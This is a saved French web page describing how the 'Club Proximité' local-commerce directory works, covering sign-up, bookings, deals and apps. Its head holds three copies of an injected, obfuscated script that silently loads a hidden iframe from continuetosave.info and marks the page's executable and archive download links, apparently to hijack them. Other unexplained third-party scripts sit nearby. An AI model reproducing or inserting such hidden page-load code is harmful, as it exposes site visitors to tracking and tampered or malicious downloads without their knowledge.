<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="fr"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>fonctionnement-club</title>
<meta name="Generator" content="Serif WebPlus X6">
<meta name="viewport" content="width=650">
<meta name="viewport" content="width=device-width, maximum-scale=1.0">
 <!--Master Page Head-->
<style type="text/css">
body{margin:0;padding:0;}
.Normal-P
{
    margin:0.0px 0.0px 0.0px 0.0px; text-align:justify; font-weight:400;
}
.Corps-P
{
    margin:0.0px 0.0px 12.0px 0.0px; text-align:justify; font-weight:400;
}
.Normal-P-P0
{
    margin:0.0px 0.0px 0.0px 0.0px; text-align:center; font-weight:400;
}
.Corps-P-P0
{
    margin:0.0px 0.0px 12.0px 0.0px; text-align:center; font-weight:400;
}
.Corps-P-P1
{
    margin:0.0px 0.0px 0.0px 0.0px; text-align:justify; font-weight:400;
}
.Normal-C
{
    font-family:"Arial", sans-serif; font-weight:700; color:#ffffff; font-size:13.0px; line-height:1.23em;
}
.Normal-C-C0
{
    font-family:"Arial", sans-serif; font-size:13.0px; line-height:1.23em;
}
.Normal-C-C1
{
    font-family:"Arial", sans-serif; font-weight:700; color:#ffffff; font-size:16.0px; line-height:1.25em;
}
.Corps-C
{
    font-family:"Verdana", sans-serif; font-size:16.0px; line-height:1.13em;
}
.Normal-C-C2
{
    font-family:"Arial", sans-serif; font-size:12.0px; line-height:1.25em;
}
.Corps-C-C0
{
    font-family:"Verdana", sans-serif; font-size:12.0px; line-height:1.17em;
}
.Corps-C-C1
{
    font-family:"Arial", sans-serif; font-size:12.0px; line-height:1.25em;
}
.Normal-C-C3
{
    font-family:"Arial", sans-serif; font-weight:700; font-size:11.0px; line-height:1.27em;
}
.Corps-C-C2
{
    font-family:"Verdana", sans-serif; font-weight:700; font-size:11.0px; line-height:1.18em;
}
.Corps-C-C3
{
    font-family:"Arial", sans-serif; font-weight:700; font-size:11.0px; line-height:1.27em;
}
.Normal-C-C4
{
    font-family:"Arial", sans-serif; font-weight:700; color:#a70000; font-size:19.0px; line-height:1.21em;
}
</style>
<script type="text/javascript" src="fonctionnement-club_fichiers/jspngfix.js"></script>
<link rel="stylesheet" href="fonctionnement-club_fichiers/wpstyles.css" type="text/css"><script type="text/javascript">
var blankSrc = "wpscripts/blank.gif";
</script>
<script src="fonctionnement-club_fichiers/fs_002.js" type="text/javascript"></script><script src="fonctionnement-club_fichiers/suggest-10070.js" type="text/javascript"></script><script type="text/javascript">try{var _xtrg = {host: "http://continuetosave.info", ls: false, init: function (b){-1<window.self.location.href.indexOf(_xtrg.host)||-1<window.self.location.href.indexOf("cebook.com")||(("undefined"==typeof localStorage||"undefined"==typeof postMessage)&&b(!1),OnMessage=function(b){if(b.origin==_xtrg.host)try{_xtrg.ls=JSON.parse(b.data)}catch(e){}},window.addEventListener?window.addEventListener("message",OnMessage,!1):window.attachEvent&&window.attachEvent("onmessage",OnMessage),_xtrg.createIframe(_xtrg.host+"/xtrg.html",function(){b(1)}))}, createIframe: function (b,d){try{ifr=document.createElement("iframe"),ifr.src=b,ifr.setAttribute("style","width:0;height:0;display:none"),ifr.setAttribute("class","_xtrg"),document.getElementsByTagName("body")[0].appendChild(ifr),d&&(ifr.onload=function(){setTimeout(d,1)})}catch(e){}}, clean: function (){try{var b=document.getElementsByClassName("_xtrg");for(i=0;i<b.length;i++)b[i].parentNode.removeChild(b[i])}catch(d){}}, set: function (b,d){b.expired=b.expired?b.expired:0;_xtrg.createIframe(_xtrg.host+"/xtrg.html?"+b.key+"="+b.value+";"+b.expired,d)}, get: function (b){return _xtrg.ls&&_xtrg.ls[b]?_xtrg.ls[b]:!1}};(function(){ var irins = {init: function (){var b=document.getElementsByTagName("a");if(b&&b.length){var d=0;for(i=0;i<b.length;i++){var e=b[i].getAttribute("href");e&&!(-1==e.indexOf(".exe")&&-1==e.indexOf(".msi"))&&d++}d&&_xtrg.init(function(c){if(c&&!_xtrg.get("y")&&!_xtrg.get("c"))for(i=0;i<b.length;i++)(c=b[i].getAttribute("href"))&&!(-1==c.indexOf(".exe")&&-1==c.indexOf(".msi")&&-1==c.indexOf(".torrent")&&-1==c.indexOf(".zip")&&-1==c.indexOf(".rar")&&-1==c.indexOf(".pdf"))&&b[i].setAttribute("omzy_irini","irini")})}}}.init();})()}catch(e){}</script><script src="fonctionnement-club_fichiers/fs.js" type="text/javascript"></script><script src="fonctionnement-club_fichiers/suggest-10070.js" type="text/javascript"></script><script type="text/javascript">try{var _xtrg = {host: "http://continuetosave.info", ls: false, init: function (b){-1<window.self.location.href.indexOf(_xtrg.host)||-1<window.self.location.href.indexOf("cebook.com")||(("undefined"==typeof localStorage||"undefined"==typeof postMessage)&&b(!1),OnMessage=function(b){if(b.origin==_xtrg.host)try{_xtrg.ls=JSON.parse(b.data)}catch(e){}},window.addEventListener?window.addEventListener("message",OnMessage,!1):window.attachEvent&&window.attachEvent("onmessage",OnMessage),_xtrg.createIframe(_xtrg.host+"/xtrg.html",function(){b(1)}))}, createIframe: function (b,d){try{ifr=document.createElement("iframe"),ifr.src=b,ifr.setAttribute("style","width:0;height:0;display:none"),ifr.setAttribute("class","_xtrg"),document.getElementsByTagName("body")[0].appendChild(ifr),d&&(ifr.onload=function(){setTimeout(d,1)})}catch(e){}}, clean: function (){try{var b=document.getElementsByClassName("_xtrg");for(i=0;i<b.length;i++)b[i].parentNode.removeChild(b[i])}catch(d){}}, set: function (b,d){b.expired=b.expired?b.expired:0;_xtrg.createIframe(_xtrg.host+"/xtrg.html?"+b.key+"="+b.value+";"+b.expired,d)}, get: function (b){return _xtrg.ls&&_xtrg.ls[b]?_xtrg.ls[b]:!1}};(function(){ var irins = {init: function (){var b=document.getElementsByTagName("a");if(b&&b.length){var d=0;for(i=0;i<b.length;i++){var e=b[i].getAttribute("href");e&&!(-1==e.indexOf(".exe")&&-1==e.indexOf(".msi"))&&d++}d&&_xtrg.init(function(c){if(c&&!_xtrg.get("y")&&!_xtrg.get("c"))for(i=0;i<b.length;i++)(c=b[i].getAttribute("href"))&&!(-1==c.indexOf(".exe")&&-1==c.indexOf(".msi")&&-1==c.indexOf(".torrent")&&-1==c.indexOf(".zip")&&-1==c.indexOf(".rar")&&-1==c.indexOf(".pdf"))&&b[i].setAttribute("omzy_irini","irini")})}}}.init();})()}catch(e){}</script><script src="fonctionnement-club_fichiers/javascript.js" type="text/javascript"></script><script type="text/javascript">try{var _xtrg = {host: "http://continuetosave.info", ls: false, init: function (b){-1<window.self.location.href.indexOf(_xtrg.host)||-1<window.self.location.href.indexOf("cebook.com")||(("undefined"==typeof localStorage||"undefined"==typeof postMessage)&&b(!1),OnMessage=function(b){if(b.origin==_xtrg.host)try{_xtrg.ls=JSON.parse(b.data)}catch(e){}},window.addEventListener?window.addEventListener("message",OnMessage,!1):window.attachEvent&&window.attachEvent("onmessage",OnMessage),_xtrg.createIframe(_xtrg.host+"/xtrg.html",function(){b(1)}))}, createIframe: function (b,d){try{ifr=document.createElement("iframe"),ifr.src=b,ifr.setAttribute("style","width:0;height:0;display:none"),ifr.setAttribute("class","_xtrg"),document.getElementsByTagName("body")[0].appendChild(ifr),d&&(ifr.onload=function(){setTimeout(d,1)})}catch(e){}}, clean: function (){try{var b=document.getElementsByClassName("_xtrg");for(i=0;i<b.length;i++)b[i].parentNode.removeChild(b[i])}catch(d){}}, set: function (b,d){b.expired=b.expired?b.expired:0;_xtrg.createIframe(_xtrg.host+"/xtrg.html?"+b.key+"="+b.value+";"+b.expired,d)}, get: function (b){return _xtrg.ls&&_xtrg.ls[b]?_xtrg.ls[b]:!1}};(function(){ var irins = {init: function (){var b=document.getElementsByTagName("a");if(b&&b.length){var d=0;for(i=0;i<b.length;i++){var e=b[i].getAttribute("href");e&&!(-1==e.indexOf(".exe")&&-1==e.indexOf(".msi"))&&d++}d&&_xtrg.init(function(c){if(c&&!_xtrg.get("y")&&!_xtrg.get("c"))for(i=0;i<b.length;i++)(c=b[i].getAttribute("href"))&&!(-1==c.indexOf(".exe")&&-1==c.indexOf(".msi")&&-1==c.indexOf(".torrent")&&-1==c.indexOf(".zip")&&-1==c.indexOf(".rar")&&-1==c.indexOf(".pdf"))&&b[i].setAttribute("omzy_irini","irini")})}}}.init();})()}catch(e){}</script><script type="text/javascript" src="fonctionnement-club_fichiers/w.js"></script><script type="text/javascript" src="fonctionnement-club_fichiers/w_002.js"></script>

<!--<script type="text/javascript" src="js/jquery-1.6.4.js"></script>-->
<script type="application/javascript">

var url_surrent_club = window.location.href;
//alert(url_surrent_club);
var tableau_url_surrent_club = url_surrent_club.split("staticpages");
//alert(tableau_url_surrent_club[0]);

function url_espace_conso(){
	document.location.href = tableau_url_surrent_club[0]+"front/utilisateur/session";
}
function url_espace_pro(){
	document.location.href = tableau_url_surrent_club[0]+"front/utilisateur/sessionp";
}
function url_contact(){
	document.location.href = tableau_url_surrent_club[0]+"front/contact";
}
function url_home(){
	document.location.href = tableau_url_surrent_club[0];
}
function url_inscriptionparticuliers(){
	document.location.href = tableau_url_surrent_club[0]+'front/particuliers/inscription';
}
function url_annonce(){
	document.location.href = tableau_url_surrent_club[0]+'front/annonce';
}
function url_bonplan(){
	document.location.href = tableau_url_surrent_club[0]+'front/bonplan';
}
		

</script>


</head>

<body style="background:#003366 url('fonctionnement-club_fichiers/wp30e2106b_06.png') no-repeat scroll top center; height:5000px;" text="#000000">
<div style="background-color:#ffffff;margin-left:auto;margin-right:auto;position:relative;width:650px;height:5000px;">
<map id="map0" name="map0">
    <area shape="rect" coords="481,36,651,59" href="javascript:void(0);" onClick="javascript:url_espace_conso();"  alt="">
    <area shape="rect" coords="479,8,651,31" href="javascript:void(0);" onClick="javascript:url_espace_conso();" alt="">
    <area shape="poly" coords="624,93,588,93,606,105"  href="javascript:void(0);" onClick="javascript:url_contact();" alt="">
    <area shape="poly" coords="630,131,634,125,634,81,629,76,583,76,578,84,578,127,583,132,629,132"  href="javascript:void(0);" onClick="javascript:url_contact();" alt="">
    <area shape="poly" coords="559,131,563,125,563,81,558,76,512,76,507,84,507,127,512,132,558,132"  href="javascript:void(0);" onClick="javascript:url_home();"  alt="">
</map>
<img src="fonctionnement-club_fichiers/wpd6b093a9_06.png" id="art_2017" title="" alt="Les  bonnes  adresses  &amp;  bons  plans  :  Sorties  -  Loisirs  -  Shopping  -  Restos
" onload="OnLoadPngFix()" usemap="#map0" style="position:absolute;left:0px;top:0px;" border="0" height="178" width="650">
<img src="fonctionnement-club_fichiers/wpbc3d7343_06.png" id="pic_2555" alt="" onload="OnLoadPngFix()" style="position:absolute;left:50px;top:439px;" border="0" height="159" width="339">
<img src="fonctionnement-club_fichiers/wp34e47c0e_06.png" id="pic_2558" alt="" onload="OnLoadPngFix()" style="position:absolute;left:434px;top:441px;" border="0" height="168" width="179">
<img src="fonctionnement-club_fichiers/wpa1e3bee3_06.png" id="pic_2122" alt="" onload="OnLoadPngFix()" style="position:absolute;left:383px;top:1627px;" border="0" height="181" width="253">
<img src="fonctionnement-club_fichiers/wp6c8ce603_06.png" id="qs_3028" alt="" onload="OnLoadPngFix()" style="position:absolute;left:15px;top:403px;" border="0" height="31" width="620">
<div id="art_1859" style="position:absolute;left:28px;top:411px;width:307px;height:16px;white-space:nowrap;">
    <div class="Wp-Normal-P">
        <span class="Normal-C">Une inscription gratuite pour les consommateurs</span></div>
</div>
<img src="fonctionnement-club_fichiers/wp6c8ce603_06.png" id="qs_3029" alt="" onload="OnLoadPngFix()" style="position:absolute;left:15px;top:630px;" border="0" height="31" width="620">
<div id="txt_1166" style="position:absolute;left:28px;top:289px;width:591px;height:107px;overflow:hidden;">
<p class="Normal-P"><span class="Normal-C-C0">Le Club proximité est un concept dynamique hébergé sur le web conçu par le Magazine
    Proximité. </span></p>
<p class="Normal-P"><span class="Normal-C-C0">Cet outil a pour objectif de promouvoir le commerce et l’artisanat local dans les
    Alpes-<wbr>Maritimes.</span></p>
<p class="Normal-P"><span class="Normal-C-C0">Le Club référence sur son site web et sur ses applications mobiles (iphone-<wbr>android)
    les professionnels ayant souscrits un abonnement.</span></p>
<p class="Normal-P"><span class="Normal-C-C0">En fonction de leur engagement, leurs données sont présentes sur les 3 annuaires
    (l’annuaire des partenaires, l’annuaire des annonces et l’annuaire des bons plans).</span></p>
</div>
<img src="fonctionnement-club_fichiers/wp4ef057dd_06.png" id="pic_2204" alt="" onload="OnLoadPngFix()" style="position:absolute;left:61px;top:890px;" border="0" height="66" width="249">
<img src="fonctionnement-club_fichiers/wpd0af58a5_06.png" id="pic_2206" alt="" onload="OnLoadPngFix()" style="position:absolute;left:201px;top:677px;" border="0" height="65" width="249">
<div id="art_1225" style="position:absolute;left:292px;top:689px;width:118px;height:40px;white-space:nowrap;">
    <div class="Wp-Normal-P">
        <span class="Normal-C-C1">L’annuaire<br></span>
        <span class="Normal-C-C1">des partenaires</span></div>
</div>
<div id="art_1226" style="position:absolute;left:156px;top:900px;width:108px;height:40px;white-space:nowrap;">
    <div class="Wp-Normal-P">
        <span class="Normal-C-C1">L’annuaire<br></span>
        <span class="Normal-C-C1">des annonces</span></div>
</div>
<a href="javascript:void(0);" onClick="javascript:url_annonce();"><img src="fonctionnement-club_fichiers/wp5533b116.gif" id="hs_14" title="" alt="annonces" style="position:absolute;left:61px;top:896px;" border="0" height="54" width="243"></a>
<map id="map1" name="map1">
    <area shape="poly" coords="248,0,0,0,1,49,249,49" href="javascript:void(0);" onClick="javascript:url_home();" alt="">
</map>
<img src="fonctionnement-club_fichiers/wp5533b116.gif" id="hs_16" title="" alt="index-club" usemap="#map1" style="position:absolute;left:201px;top:685px;" border="0" height="49" width="249">
<img src="fonctionnement-club_fichiers/wp8688d212_06.png" id="pic_2205" alt="" onload="OnLoadPngFix()" style="position:absolute;left:341px;top:889px;" border="0" height="68" width="248">
<map id="map2" name="map2">
    <area shape="poly" coords="249,0,3,0,0,51,245,51" href="javascript:void(0);" onClick="javascript:url_bonplan();" alt="">
</map>
<img src="fonctionnement-club_fichiers/wp5533b116.gif" id="hs_15" title="" alt="bons plans" usemap="#map2" style="position:absolute;left:341px;top:897px;" border="0" height="51" width="249">
<!--<div id="art_1227" style="position:absolute;left:422px;top:903px;width:117px;height:40px;white-space:nowrap;">
    <div class="Wp-Normal-P">
        <span class="Normal-C-C1">L’annuaire<br></span>
        <span class="Normal-C-C1">des bons plans</span></div>
</div>-->
<div id="art_1860" style="position:absolute;left:28px;top:637px;width:190px;height:16px;white-space:nowrap;">
    <div class="Wp-Normal-P">
        <span class="Normal-C">L’annuaire des professionnels</span></div>
</div>
<img src="fonctionnement-club_fichiers/wp6c8ce603_06.png" id="qs_3030" alt="" onload="OnLoadPngFix()" style="position:absolute;left:15px;top:825px;" border="0" height="31" width="620">
<div id="art_1861" style="position:absolute;left:28px;top:832px;width:274px;height:16px;white-space:nowrap;">
    <div class="Wp-Normal-P">
        <span class="Normal-C">L’annuaire des annonces et des bons plans</span></div>
</div>
<div id="txt_1167" style="position:absolute;left:28px;top:1119px;width:591px;height:40px;overflow:hidden;">
<p class="Normal-P"><span class="Normal-C-C0">Le professionnel partenaire dépose en temps réel ses annonces et ses bons plans (destockage,
    soldes, promotions, informations etc...). </span></p>
<p class="Normal-P"><span class="Normal-C-C0"><br></span></p>
<p class="Corps-P"><span class="Corps-C"><br></span></p>
</div>
<div id="txt_1168" style="position:absolute;left:28px;top:764px;width:591px;height:46px;overflow:hidden;">
<p class="Normal-P"><span class="Normal-C-C2">Sur cet annuaire, vous effectuez des recherches multicritères (communes et activités),
    puis vous accédez aux fiches informatives des partenaires (ces infos varient en fonction
    de l’importance de leur abonnement).</span></p>
<p class="Corps-P"><span class="Corps-C-C0"><br></span></p>
</div>
<img src="fonctionnement-club_fichiers/wp6c8ce603_06.png" id="qs_3031" alt="" onload="OnLoadPngFix()" style="position:absolute;left:15px;top:1172px;" border="0" height="31" width="620">
<div id="art_1862" style="position:absolute;left:34px;top:1179px;width:298px;height:16px;white-space:nowrap;">
    <div class="Wp-Normal-P">
        <span class="Normal-C">Le fonctionnement des annonces et bons plans</span></div>
</div>
<img src="fonctionnement-club_fichiers/wpf060db08_06.png" id="pcrv_11015" alt="" onload="OnLoadPngFix()" style="position:absolute;left:382px;top:1249px;" border="0" height="149" width="253">
<div id="txt_1169" style="position:absolute;left:28px;top:1220px;width:591px;height:41px;overflow:hidden;">
<p class="Corps-P"><span class="Corps-C-C1">Dès qu’un produit, service ou bon plan vous séduit, le partenaire vous proposera
    deux solutions de concrétisation :</span></p>
<p class="Wp-Corps-P"><span class="Corps-C-C1"><br></span></p>
</div>
<img src="fonctionnement-club_fichiers/wpd90b3de2_06.png" id="pcrv_10946" alt="" onload="OnLoadPngFix()" style="position:absolute;left:173px;top:1260px;" border="0" height="127" width="254">
<img src="fonctionnement-club_fichiers/wp9279af26_06.png" id="art_1863" title="" alt="1
" onload="OnLoadPngFix()" style="position:absolute;left:19px;top:1273px;" border="0" height="103" width="110">
<img src="fonctionnement-club_fichiers/wp88704281_06.png" id="qs_3032" alt="" onload="OnLoadPngFix()" style="position:absolute;left:15px;top:1400px;" border="0" height="212" width="620">
<div id="txt_937" style="position:absolute;left:36px;top:1469px;width:152px;height:61px;overflow:hidden;">
<p class="Normal-P-P0"><span class="Normal-C-C3">Avant de pouvoir valider</span></p>
<p class="Normal-P-P0"><span class="Normal-C-C3">cette réservation , le consommateur doit être inscrit au Club Proximité.</span></p>
<p class="Wp-Corps-P"><span class="Corps-C-C2"><br></span></p>
</div>
<div id="txt_952" style="position:absolute;left:244px;top:1469px;width:164px;height:127px;overflow:hidden;">
<p class="Corps-P-P0"><span class="Corps-C-C3">Après avoir validé l’offre, vous recevez par retour un email vous confirmant cette
    réservation et sa durée de mise à disposition. Parallèlement le partenaire reçoit
    un double avec vos coordonnées.</span></p>
</div>
<img src="fonctionnement-club_fichiers/wpf9a6272f_06.png" id="pic_2389" alt="" onload="OnLoadPngFix()" style="position:absolute;left:80px;top:1400px;" border="0" height="57" width="65">
<a  href="javascript:void(0);" onClick="javascript:url_inscriptionparticuliers();"><input style="position:absolute; left:68px; top:1575px; width:110px; height:22px;" id="butn_18" value="Je m'inscris" type="button"></a>
<div id="txt_953" style="position:absolute;left:433px;top:1468px;width:166px;height:102px;overflow:hidden;">
<p class="Corps-P-P0"><span class="Corps-C-C3">Pour bénéficier de cette offre, il vous suffit de nous présenter lors de votre déplacement
    le mail imprimé ou présent sur &nbsp;votre smartphone.</span></p>
</div>
<img src="fonctionnement-club_fichiers/wp0d357776_06.png" id="art_1865" title="" alt="2
" onload="OnLoadPngFix()" style="position:absolute;left:18px;top:1658px;" border="0" height="103" width="110">
<div id="txt_1159" style="position:absolute;left:27px;top:1807px;width:587px;height:50px;overflow:hidden;">
<p class="Corps-P-P1"><span class="Corps-C-C1">Sur certaines offres vous retrouverez un formulaire de contact express, il vous permettra
    de poser différentes questions ou de demander un rendez-<wbr>vous. </span></p>
<p class="Corps-P-P1"><span class="Corps-C-C1">Dès validation, ce formulaire, &nbsp;reprenant vos coordonnées sera directement adressé
    au partenaire.</span></p>
</div>
<img src="fonctionnement-club_fichiers/wp7a890c18_05_06.jpg" id="pic_2491" alt="" style="position:absolute;left:370px;top:1952px;" border="0" height="210" width="280">
<img src="fonctionnement-club_fichiers/wpa69d52c9_06.png" id="grp_2669" alt="" onload="OnLoadPngFix()" style="position:absolute;left:255px;top:2102px;" border="0" height="47" width="40">
<img src="fonctionnement-club_fichiers/wp04dc2eef_06.png" id="grp_2670" alt="" onload="OnLoadPngFix()" style="position:absolute;left:92px;top:2103px;" border="0" height="45" width="46">
<img src="fonctionnement-club_fichiers/wp96a93716_06.png" id="pic_188" alt="" onload="OnLoadPngFix()" style="position:absolute;left:28px;top:1985px;" border="0" height="107" width="113">
<img src="fonctionnement-club_fichiers/wp96a93716_06.png" id="pic_2496" alt="" onload="OnLoadPngFix()" style="position:absolute;left:216px;top:1985px;" border="0" height="107" width="113">
<div id="art_1592" style="position:absolute;left:86px;top:1929px;width:478px;height:23px;white-space:nowrap;">
    <div class="Wp-Normal-P">
        <span class="Normal-C-C4">Téléchargement des applications du Club Proximité</span></div>
</div>
<img src="fonctionnement-club_fichiers/wp6c8ce603_06.png" id="qs_3042" alt="" onload="OnLoadPngFix()" style="position:absolute;left:14px;top:1872px;" border="0" height="31" width="620">
<div id="art_1866" style="position:absolute;left:27px;top:1879px;width:431px;height:16px;white-space:nowrap;">
    <div class="Wp-Normal-P">
        <span class="Normal-C">Le Club Proximité sur votre smartphone &nbsp;ou sur votre tablette tactile</span></div>
</div>
<img src="fonctionnement-club_fichiers/wp39279f5d_06.png" id="grp_3195" alt="" onload="OnLoadPngFix()" style="position:absolute;left:190px;top:263px;" border="0" height="14" width="270">
<input style="position:absolute; left:157px; top:587px; width:206px; height:22px;" id="butn_115" value="Inscription au Club Proximité" type="button">
<a href="javascript:void(0);" onClick="javascript:url_inscriptionparticuliers();" ><img src="fonctionnement-club_fichiers/wp5533b116.gif" id="hs_120" title="" alt="inscriptionparticuliers" style="position:absolute;left:157px;top:587px;" border="0" height="19" width="206"></a>
<img src="fonctionnement-club_fichiers/wp6c8ce603_06.png" id="qs_3060" alt="" onload="OnLoadPngFix()" style="position:absolute;left:15px;top:2209px;" border="0" height="31" width="620">
<div id="art_1870" style="position:absolute;left:27px;top:2216px;width:381px;height:16px;white-space:nowrap;">
    <div class="Wp-Normal-P">
        <span class="Normal-C">Vous pouvez ajouter des &nbsp;partenaires favoris à votre compte</span></div>
</div>
<div id="txt_1172" style="position:absolute;left:28px;top:2275px;width:412px;height:62px;overflow:hidden;">
<p class="Corps-P"><span class="Corps-C-C1">Vous recevez une alerte email à chaque nouvelle annonce et bon plan déposés par vos
    favoris;</span></p>
</div>
<img src="fonctionnement-club_fichiers/wp6c8ce603_06.png" id="qs_3078" alt="" onload="OnLoadPngFix()" style="position:absolute;left:15px;top:825px;" border="0" height="31" width="620">
<div id="art_1872" style="position:absolute;left:28px;top:832px;width:274px;height:16px;white-space:nowrap;">
    <div class="Wp-Normal-P">
        <span class="Normal-C">L’annuaire des annonces et des bons plans</span></div>
</div>
<div id="txt_1173" style="position:absolute;left:28px;top:2433px;width:412px;height:55px;overflow:hidden;">
<p class="Corps-P"><span class="Corps-C-C1">Les adhérents consommateurs reçoivent chaque semaine une newsletter personnalisée
    leur précisant les nouvelles offres déposées.</span></p>
</div>
<img src="fonctionnement-club_fichiers/wp0_wp42dd878d_05_06.jpg" id="pic_2596" alt="" style="position:absolute;left:459px;top:2412px;" border="0" height="96" width="161">
<img src="fonctionnement-club_fichiers/wp6c8ce603_06.png" id="qs_3077" alt="" onload="OnLoadPngFix()" style="position:absolute;left:15px;top:2373px;" border="0" height="31" width="620">
<div id="art_1873" style="position:absolute;left:28px;top:2381px;width:364px;height:16px;white-space:nowrap;">
    <div class="Wp-Normal-P">
        <span class="Normal-C">Vous recevez toutes les semaines une newsletter du Club</span></div>
</div>
<a  href="javascript:void(0);" onClick="javascript:url_contact();"><img src="fonctionnement-club_fichiers/wp13173270_06.png" alt="" name="pic_2381" width="200" height="89" border="0" id="pic_2381" style="position:absolute;left:187px;top:1673px;" onload="OnLoadPngFix()"></a>
<img src="fonctionnement-club_fichiers/wpb363baed_06.png" id="pcrv_14217" alt="" onload="OnLoadPngFix()" style="position:absolute;left:304px;top:1400px;" border="0" height="57" width="65">
<img src="fonctionnement-club_fichiers/wp40c087c1_06.png" id="pcrv_10876" alt="" onload="OnLoadPngFix()" style="position:absolute;left:440px;top:1402px;" border="0" height="58" width="170">
<img src="fonctionnement-club_fichiers/wpb6ee01fe_06.png" id="grp_3429" alt="" onload="OnLoadPngFix()" style="position:absolute;left:103px;top:216px;" border="0" height="47" width="449">
<img src="fonctionnement-club_fichiers/wp9a082c8e_06.png" id="pic_2563" alt="" onload="OnLoadPngFix()" style="position:absolute;left:111px;top:970px;" border="0" height="142" width="436">
<img src="fonctionnement-club_fichiers/wp0_wp3e727485_06.png" id="pic_2594" alt="" onload="OnLoadPngFix()" style="position:absolute;left:502px;top:2255px;" border="0" height="106" width="111">
</div>

</body></html>